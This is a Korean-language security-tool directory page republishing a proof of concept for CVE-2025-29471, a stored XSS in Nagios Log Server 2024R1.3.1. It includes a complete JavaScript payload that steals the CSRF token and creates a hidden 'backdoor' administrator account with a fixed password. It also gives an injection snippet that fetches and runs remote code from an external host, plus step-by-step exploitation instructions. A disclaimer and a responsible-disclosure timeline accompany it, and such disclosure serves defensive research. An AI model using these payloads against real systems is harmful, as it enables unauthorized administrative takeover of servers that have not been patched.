Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-29471 — Nagios Log Server 2024R1.3.1의 저장된 XSS | Kitploit
도구/GitHubGitHub/skraft9/cve-2025-29471
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubskraft9/cve-2025-29471

CVE-2025-29471

Nagios Log Server 2024R1.3.1의 저장된 XSS

저장소 보기
135일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Nagios Log Server의 저장형 XSS 취약점 (관리자 권한 상승)

▶️ PoC 데모

날짜: 2025-04-02

익스플로잇 작성자: Seth Kraft

공급업체 홈페이지: https://www.nagios.com/

공급업체 변경 로그: https://www.nagios.com/changelog/#log-server

소프트웨어 링크: https://assets.nagios.com/downloads/nagios-log-server/versions.php

영향을 받는 버전: 2024R1.3.1 및 이하

테스트 환경: Nagios Log Server 2024R1.3.1 (기본 구성, Ubuntu 20.04)

CWE-ID: CWE-79

기본 점수: 8.3 (높음)

벡터 문자열: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

유형: 저장형 크로스 사이트 스크립팅 (XSS), 권한 상승


승인

승인된 테스트 및 연구 목적으로만 사용하십시오. 귀하가 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에서 이 취약점을 테스트 또는 악용하지 마십시오.


설명:

Nagios Log Server 2024R1.3.1의 저장형 XSS 취약점으로 인해 낮은 권한의 사용자가 프로필의 'email' 필드에 악성 JavaScript를 주입할 수 있습니다.

관리자가 감사 로그를 확인하면 페이로드가 실행되어 권한이 없는 관리자 계정 생성으로 인한 권한 상승이 발생합니다.


개념 증명

  1. 외부 서버에 다음 내용의 xss.js 페이로드를 호스팅하세요. Github도 잘 작동합니다.

    <target-ip>를 Nagios Log Server 대상의 IP/호스트명으로 업데이트하세요.

root@kitploit:~
(function() {
  console.log("🔥[XSS] Payload Executing...🔥");

  var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/);
  if (!csrfTokenMatch) return;
  var csrfToken = encodeURIComponent(csrfTokenMatch[1]);
  console.log("[XSS] CSRF Token:", csrfToken);

  var requestBody = "csrf_ls=" + csrfToken +
    "&name=backdoor" +
    "&[email protected]" +
    "&username=backdoor" +
    "&password=Password123!" +
    "&password2=Password123!" +
    "&auth_type=admin" +
    "&apiaccess=1" +
    "&language=en_US" +
    "&account_type=local";

  fetch("http://<target-ip>/nagioslogserver/admin/users/create", {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: requestBody
  })
  .then(response => response.text())
  .then(function(data) {
    console.log("🔥[XSS] User Created Successfully!🔥");
    console.log(data);
  })
  .catch(console.error);
})();
  1. Nagios Log Server에 표준(비관리자) 사용자로 로그인합니다.

  2. 프로필 업데이트 엔드포인트로 이동합니다:

    http://<target-ip>/nagioslogserver/profile/update

  3. 이메일 필드에 다음 페이로드를 주입합니다. fetch 줄을 xss.js가 저장된 URL로 업데이트하세요.

root@kitploit:~
<script>
fetch("https://<EXTERNAL-HOST>/xss.js")
  .then(response => response.text())
  .then(scriptText => eval(scriptText))
  .catch(console.error);
</script>
  1. 관리자가 감사 로그를 확인할 때까지 기다립니다. JavaScript가 실행되어 새 관리자 계정이 생성됩니다:

사용자 이름: backdoor

비밀번호: Password123!

  1. Nagios Log Server에서 backdoor로 전체 관리자 액세스 권한으로 로그인합니다.

공개 타임라인

  • 2025-02-07: 연구원이 Nagios에 취약점 보고
  • 2025-02-14: Nagios가 보안 보고서 접수 확인
  • 2025-03-03: 연구원이 Nagios에 업데이트 요청
  • 2025-03-10: 연구원이 Nagios에 업데이트 요청
  • 2025-03-17: Nagios가 취약점이 해결되었으며 수정 사항이 곧 출시될 예정임을 확인
  • 2025-03-19: Nagios가 Nagios Log Server 2024R2 출시
  • 2025-03-27: 연구원이 Nagios Log Server 2024R2가 저장형 XSS 취약점을 해결했는지 테스트 및 확인하고 Nagios에 업데이트
  • 2025-04-01: MITRE가 이 저장형 XSS 취약점에 대해 CVE-2025-29471을 예약했지만, 공급업체의 공개 보안 권고가 없어 세부 정보는 공개되지 않음
  • 2025-04-09: Nagios가 2024R2 수정 사항의 후속 버전(2024R1.3.2)을 출시하여 저장형 XSS 취약점 수정 사항을 2024R1 브랜치로 백포트
  • 2025-04-15: CVE-2025-29471이 공식적으로 게시됨

면책 조항

이 작업은 저의 고용 외부에서 수행되었으며 사이버 보안 연구에 대한 개인적인 노력을 반영합니다.

도구 다운로드